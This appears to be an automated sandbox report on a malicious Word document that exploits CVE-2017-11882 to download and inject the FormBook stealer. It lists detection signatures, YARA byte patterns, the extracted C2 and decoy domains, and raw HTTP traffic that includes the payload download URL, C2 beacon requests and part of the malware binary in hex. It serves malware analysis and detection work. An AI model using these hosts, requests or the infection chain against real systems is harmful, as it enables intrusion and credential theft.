Windows Analysis Report Purchase order.doc

Overview

General Information

Sample Name: Purchase order.doc
Analysis ID: 510256
MD5: b0e95a4af180627b781257494c5bd43b
SHA1: a660ad6781f25a7a3ce699751495f0cb2adf7196
SHA256: 51d82db8f2b1b3d5387e3c400b1a3ad27371e4340343aa4affe4165d51334d90
Tags: doc

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2596 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 2856 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • villar8681.exe (PID: 2808 cmdline: C:\Users\user\AppData\Roaming\villar8681.exe MD5: E78C85674617F34A2F69FFC8DA6A3C48)
      • villar8681.exe (PID: 1312 cmdline: C:\Users\user\AppData\Roaming\villar8681.exe MD5: E78C85674617F34A2F69FFC8DA6A3C48)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • raserver.exe (PID: 344 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 0842FB9AC27460E2B0107F6B3A872FD5)
            • cmd.exe (PID: 2584 cmdline: /c del 'C:\Users\user\AppData\Roaming\villar8681.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.filecrev.com/jy0b/"], "decoy": ["lamejorimagen.com", "mykabukibrush.com", "modgon.com", "barefoottherapeutics.com", "shimpeg.net", "trade-sniper.com", "chiangkhancityhotel.com", "joblessmoni.club", "stespritsubways.com", "chico-group.com", "nni8.xyz", "searchtypically.online", "jobsyork.com", "bestsales-crypto.com", "iqmarketing.info", "bullcityphotobooths.com", "fwssc.icu", "1oc87s.icu", "usdiesel.xyz", "secrets2optimumnutrition.com", "charlotte-s-creations.com", "homenetmidrand.com", "sytypij.xyz", "tapehitsscriptsparty.com", "adelenashville.com", "greendylife.com", "agbqs.com", "lilcrox.xyz", "thepersonalevolutionmaven.com", "graciasmiangel.com", "heidisgifts.com", "flchimneyspecialists.com", "yorkrehabclinic.com", "cent-pour-centsons.com", "marcoislandsupsurf.net", "expressdiagnostics.info", "surferjackproductions.com", "duscopy.store", "uekra.tech", "campaigncupgunplant.xyz", "cheetahadvance.com", "blickosinski.icu", "laketacostahoe.com", "drippysupplyco.com", "isomassagegun.com", "clarition.com", "andrew-pillar.com", "truthbudgeting.com", "cloudfixr.com", "cfasministries.com", "compliant-now-beta.com", "kssc17.icu", "plewabuilders.com", "uslugi-email.site", "167hours.com", "sodo6697.com", "voyagesify.com", "ranodalei.com", "culturao.com", "littlepotato-id.com", "integtiryhvacsanmateo.com", "neatmounts.com", "reddictnflstream.com", "digistore-maya.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed under each row)

00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18839:$sqlite3step: 68 34 1C 7B E1
  • 0x1894c:$sqlite3step: 68 34 1C 7B E1
  • 0x18868:$sqlite3text: 68 38 2A 90 C5
  • 0x1898d:$sqlite3text: 68 38 2A 90 C5
  • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author (matched strings listed under each row)

5.0.villar8681.exe.400000.5.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.villar8681.exe.400000.5.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.villar8681.exe.400000.5.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a39:$sqlite3step: 68 34 1C 7B E1
  • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a68:$sqlite3text: 68 38 2A 90 C5
  • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
5.2.villar8681.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.villar8681.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection | Author: Joe Security | Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2856, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2856, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth | Data: Command: C:\Users\user\AppData\Roaming\villar8681.exe, CommandLine: C:\Users\user\AppData\Roaming\villar8681.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\villar8681.exe, NewProcessName: C:\Users\user\AppData\Roaming\villar8681.exe, OriginalFileName: C:\Users\user\AppData\Roaming\villar8681.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2856, ProcessCommandLine: C:\Users\user\AppData\Roaming\villar8681.exe, ProcessId: 2808

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.filecrev.com/jy0b/"], "decoy": ["lamejorimagen.com", "mykabukibrush.com", "modgon.com", "barefoottherapeutics.com", "shimpeg.net", "trade-sniper.com", "chiangkhancityhotel.com", "joblessmoni.club", "stespritsubways.com", "chico-group.com", "nni8.xyz", "searchtypically.online", "jobsyork.com", "bestsales-crypto.com", "iqmarketing.info", "bullcityphotobooths.com", "fwssc.icu", "1oc87s.icu", "usdiesel.xyz", "secrets2optimumnutrition.com", "charlotte-s-creations.com", "homenetmidrand.com", "sytypij.xyz", "tapehitsscriptsparty.com", "adelenashville.com", "greendylife.com", "agbqs.com", "lilcrox.xyz", "thepersonalevolutionmaven.com", "graciasmiangel.com", "heidisgifts.com", "flchimneyspecialists.com", "yorkrehabclinic.com", "cent-pour-centsons.com", "marcoislandsupsurf.net", "expressdiagnostics.info", "surferjackproductions.com", "duscopy.store", "uekra.tech", "campaigncupgunplant.xyz", "cheetahadvance.com", "blickosinski.icu", "laketacostahoe.com", "drippysupplyco.com", "isomassagegun.com", "clarition.com", "andrew-pillar.com", "truthbudgeting.com", "cloudfixr.com", "cfasministries.com", "compliant-now-beta.com", "kssc17.icu", "plewabuilders.com", "uslugi-email.site", "167hours.com", "sodo6697.com", "voyagesify.com", "ranodalei.com", "culturao.com", "littlepotato-id.com", "integtiryhvacsanmateo.com", "neatmounts.com", "reddictnflstream.com", "digistore-maya.com"]}
Multi AV Scanner detection for submitted file
Source: Purchase order.doc | Virustotal: Detection: 40%
Source: Purchase order.doc | ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match | File source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://binatonezx.tk/villarzx.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: binatonezx.tk | Virustotal: Detection: 15%
Source: www.filecrev.com | Virustotal: Detection: 5%
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp | Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe | ReversingLabs: Detection: 37%
Source: C:\Users\user\AppData\Roaming\villar8681.exe | ReversingLabs: Detection: 37%
Source: 5.0.villar8681.exe.400000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.villar8681.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.villar8681.exe.400000.9.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.villar8681.exe.400000.7.unpack | Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\villar8681.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\villar8681.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RAServer.pdb^ source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdb source: villar8681.exe, raserver.exe
Source: Binary string: RAServer.pdb source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
Source: global traffic | DNS query: name: binatonezx.tk
Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 4x nop then pop edi
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 2.56.59.211:80
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 2.56.59.211:80
Source: winword.exe | Memory has grown: Private usage: 0MB later: 106MB

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.charlotte-s-creations.com
Source: C:\Windows\explorer.exe | Network Connect: 54.156.84.168 80
Source: C:\Windows\explorer.exe | Domain query: www.filecrev.com
Source: C:\Windows\explorer.exe | Network Connect: 202.165.66.108 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.filecrev.com/jy0b/
Source: Joe Sandbox View | ASN Name: GBTCLOUDUS GBTCLOUDUS
Source: global traffic | HTTP traffic detected: GET /jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj HTTP/1.1 | Host: www.filecrev.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj HTTP/1.1 | Host: www.charlotte-s-creations.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 2.56.59.211 2.56.59.211
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 14:39:11 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Wed, 27 Oct 2021 07:18:31 GMTETag: "82400-5cf5066baacfe"Accept-Ranges: bytesContent-Length: 533504Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e4 a2 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 08 00 00 0a 00 00 00 00 00 00 0a 36 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 35 08 00 4f 00 00 00 00 40 08 00 28 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 16 08 00 00 20 00 00 00 18 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 28 06 00 00 00 40 08 00 00 08 00 00 00 1a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 22 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 35 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 b8 be 00 00 03 00 00 
00 74 01 00 06 c8 7c 01 00 f0 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00
Source: global traffic | HTTP traffic detected: GET /villarzx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: binatonezx.tk | Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.0Date: Wed, 27 Oct 2021 14:40:40 GMTContent-Type: application/json; charset=utf-8Content-Length: 181Connection: closeX-Powered-By: ExpressETag: W/"b5-7t+tQyc7QpflCZNr+ruKCrIOKs0"Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 63 6c 69 63 6b 2f 70 72 6f 78 79 6a 73 2f 6a 79 30 62 2f 3f 30 36 33 38 34 44 71 70 3d 54 79 47 44 4a 68 4c 2f 63 41 2b 35 37 77 66 75 66 61 5a 52 79 4d 4d 72 51 6b 38 75 50 64 32 64 36 4e 66 59 38 31 52 73 6a 34 36 62 5a 68 4f 4a 4c 58 67 5a 35 32 32 42 75 70 42 45 37 2b 42 71 51 73 50 38 38 51 3d 3d 26 63 74 3d 58 68 68 34 6e 4c 33 38 59 4e 76 70 6a 22 7d Data Ascii: {"statusCode":404,"error":"Not Found","message":"Cannot GET /click/proxyjs/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj"}
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: villar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.432356441.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.467536657.0000000001D60000.00000002.00020000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.432208607.0000000003D90000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.453889222.0000000008448000.00000004.00000001.sdmp | String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: villar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000006.00000000.452985686.0000000007159000.00000004.00000001.sdmp | String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmp | String found in binary or memory: http://www.msn.com/?ocid=iehp
